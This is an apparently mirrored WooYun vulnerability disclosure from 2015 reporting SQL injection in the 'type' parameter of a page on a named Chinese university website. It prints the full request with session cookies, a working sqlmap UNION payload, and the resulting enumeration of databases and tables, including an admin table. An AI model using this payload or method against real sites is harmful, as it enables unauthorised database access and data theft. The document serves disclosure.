乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-26: 细节已通知厂商并且等待厂商处理中 2015-12-31: 厂商已经主动忽略漏洞,细节向公众公开
RT
http://jpk.scuec.edu.cn 中南民族大学
GET /yaoxue1/shenbao.php?type=64 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://jpk.scuec.edu.cnCookie: visitied=yes; 786e40a010f49e301ecb6a5cbe1d07f3=244edbokebcdgl9c9p0310j975; ja_purity_tpl=ja_purity; PHPSESSID=gdufhod88p4h7pn3va4nf8a2o2; ASPSESSIONIDSSQBCSRT=ENAHAPECEBDILDKODBMAOCMF; wordpress_test_cookie=WP+Cookie+check; ja_purity_ja_font=4Host: jpk.scuec.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
type参数存在注入
sqlmap resumed the following injection point(s) from stored session:---Parameter: type (GET) Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: type=-3744 UNION ALL SELECT CONCAT(0x716a626a71,0x4b45486141586e416b6e4a6e6f7464486d4746796158667a4971654473427a5566614b6b7175486d,0x71626b6271)-- ----web application technology: Apache, PHP 5.1.6back-end DBMS: MySQL 5.0current user: 'yaoxue1@localhost'current database: 'yaoxue1'current user is DBA: Falseavailable databases [3]:[*] information_schema[*] test[*] yaoxue1
Database: yaoxue1[14 tables]+-------------------------+| md_yxfx_admin888 || md_yxfx_gustbook || md_yxfx_link || md_yxfx_news || md_yxfx_newscata || md_yxfx_sigle || sizz_znylx_content || sizz_znylx_group || sizz_znylx_index || sizz_znylx_limit || sizz_znylx_link || sizz_znylx_reply || sizz_znylx_slavecatalog || sizz_znylx_user |+-------------------------+
危害等级:无影响厂商忽略
忽略时间:2015-12-31 22:14
漏洞Rank:4 (WooYun评价)
暂无